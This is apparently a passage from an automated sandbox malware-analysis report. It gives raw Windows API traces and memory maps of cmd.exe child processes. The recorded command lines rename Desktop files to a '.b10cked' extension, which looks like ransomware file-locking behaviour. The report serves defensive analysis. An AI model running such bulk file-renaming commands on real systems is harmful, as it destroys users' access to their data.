GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.082] GetConsoleOutputCP () returned 0x1b5 [0225.082] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.082] GetUserDefaultLCID () returned 0x409 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fbb8, cchData=128 | out: lpLCData="0") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fbb8, cchData=128 | out: 
lpLCData="0") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fbb8, cchData=128 | out: lpLCData="1") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.083] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.084] GetConsoleTitleW (in: lpConsoleTitle=0x3908e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.084] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.084] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.084] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.085] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.085] _wcsicmp 
(_String1="move", _String2=")") returned 68 [0225.085] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.085] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.086] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.086] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.086] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.086] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.088] GetConsoleTitleW (in: lpConsoleTitle=0x22f8b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.379] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.379] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.379] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.379] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.379] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.379] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.379] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.379] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.379] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.379] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.379] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.379] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0225.379] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.379] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.379] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.379] _wcsicmp (_String1="move", _String2="MD") returned 11 [0225.379] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.379] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.379] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.379] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.379] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.379] 
_wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.379] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.379] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.380] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.380] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.380] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.380] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.380] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0225.380] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.380] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.380] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.380] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0225.380] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.380] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.381] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f66c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f664, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f664*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) 
returned 3 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.383] 
_wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.383] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.383] _wcsicmp (_String1="WTCCLC~1.WAV", _String2=".") returned 73 [0225.383] _wcsicmp (_String1="WTCCLC~1.WAV", _String2="..") returned 73 [0225.383] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclc~1.wav")) returned 0x20 [0225.383] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.383] SetErrorMode (uMode=0x0) returned 0x0 [0225.384] SetErrorMode (uMode=0x1) returned 0x0 [0225.384] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", nBufferLength=0x104, lpBuffer=0x22eff4, lpFilePart=0x22efdc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", lpFilePart=0x22efdc*="WTCCLC~1.WAV") returned 0x2a [0225.384] SetErrorMode (uMode=0x0) returned 0x1 [0225.384] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki")) returned 0x12 [0225.384] _wcsicmp (_String1="WTCCLC~1.WAV", _String2=".") returned 73 [0225.384] _wcsicmp (_String1="WTCCLC~1.WAV", _String2="..") returned 73 [0225.384] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclc~1.wav")) returned 0x20 [0225.384] SetErrorMode (uMode=0x0) returned 0x0 [0225.384] SetErrorMode (uMode=0x1) returned 0x0 [0225.384] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", nBufferLength=0x104, lpBuffer=0x22f470, 
lpFilePart=0x22f208 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", lpFilePart=0x22f208*="WTCCLC~1.WAV") returned 0x2a [0225.384] SetErrorMode (uMode=0x0) returned 0x1 [0225.384] SetErrorMode (uMode=0x0) returned 0x0 [0225.384] SetErrorMode (uMode=0x1) returned 0x0 [0225.384] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked", nBufferLength=0x104, lpBuffer=0x22f678, lpFilePart=0x22f208 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked", lpFilePart=0x22f208*="WtCCLcHrwK.wav.b10cked") returned 0x34 [0225.384] SetErrorMode (uMode=0x0) returned 0x1 [0225.384] SetLastError (dwErrCode=0x0) [0225.384] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav.b10cked")) returned 0xffffffff [0225.384] GetLastError () returned 0x2 [0225.385] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", fInfoLevelId=0x1, lpFindFileData=0x22eb84, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb84) returned 0x390e68 [0225.385] FindNextFileW (in: hFindFile=0x390e68, lpFindFileData=0x22eb84 | out: lpFindFileData=0x22eb84) returned 0 [0225.385] GetLastError () returned 0x12 [0225.385] FindClose (in: hFindFile=0x390e68 | out: hFindFile=0x390e68) returned 1 [0225.386] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", fInfoLevelId=0x1, lpFindFileData=0x3a1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1bd8) returned 0x390e68 [0225.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked", nBufferLength=0x104, lpBuffer=0x22ee1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked", lpFilePart=0x0) returned 0x34 [0225.386] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav", nBufferLength=0x104, lpBuffer=0x22ee1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav", lpFilePart=0x0) returned 0x2c [0225.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav")) returned 0x20 [0225.387] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav.b10cked"), dwFlags=0x3) returned 1 [0225.387] FindClose (in: hFindFile=0x390e68 | out: hFindFile=0x390e68) returned 1 [0225.387] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22edd0 | out: _Buffer=" 1") returned 9 [0225.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.388] GetFileType (hFile=0x7) returned 0x2 [0225.388] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.388] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ed5c | out: lpMode=0x22ed5c) returned 1 [0225.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22ed90 | out: lpConsoleScreenBufferInfo=0x22ed90) returned 1 [0225.388] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0225.389] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x22edd0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22edb4, lpReserved=0x0 | out: 
lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x22edb4*=0x1a) returned 1 [0225.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.389] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.389] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.389] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.389] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.389] SetConsoleInputExeNameW () returned 0x1 [0225.389] GetConsoleOutputCP () returned 0x1b5 [0225.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.389] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.390] exit (_Code=0) Process: id = "591" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33619 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33620 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 
33621 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33622 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 33623 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33624 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33625 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33626 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33627 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33628 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33910 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33911 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33912 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33913 start_va = 
0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 33914 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 33915 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33916 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33917 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33918 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33919 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33920 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33921 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33922 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" 
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33923 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33924 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 33925 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33926 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33927 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33928 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 33929 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 33930 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 33931 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 33932 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 33933 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 816 os_tid = 0xcb4 [0225.570] GetSystemTimeAsFileTime (in: 
lpSystemTimeAsFileTime=0x1afc74 | out: lpSystemTimeAsFileTime=0x1afc74*(dwLowDateTime=0xba04d2e0, dwHighDateTime=0x1d440a9)) [0225.570] GetCurrentProcessId () returned 0xd60 [0225.570] GetCurrentThreadId () returned 0xcb4 [0225.570] GetTickCount () returned 0x3e455 [0225.570] QueryPerformanceCounter (in: lpPerformanceCount=0x1afc6c | out: lpPerformanceCount=0x1afc6c*=28235951332) returned 1 [0225.571] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.571] __set_app_type (_Type=0x1) [0225.571] __p__fmode () returned 0x76b331f4 [0225.571] __p__commode () returned 0x76b331fc [0225.571] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.571] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.572] GetCurrentThreadId () returned 0xcb4 [0225.572] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb4) returned 0x38 [0225.572] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.572] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.572] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.572] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.572] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afc04 | out: phkResult=0x1afc04*=0x0) returned 0x2 [0225.572] VirtualQuery (in: lpAddress=0x1afc3b, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.572] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0xb0000, AllocationBase=0xb0000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.572] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.572] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.572] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.572] GetConsoleOutputCP () returned 0x1b5 [0225.573] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.573] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.573] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.573] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.573] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.573] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.573] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.574] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.574] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.574] GetEnvironmentStringsW () returned 0x2c0178* [0225.574] FreeEnvironmentStringsW (penv=0x2c0178) returned 1 [0225.574] GetEnvironmentStringsW () returned 0x2c0178* [0225.574] FreeEnvironmentStringsW 
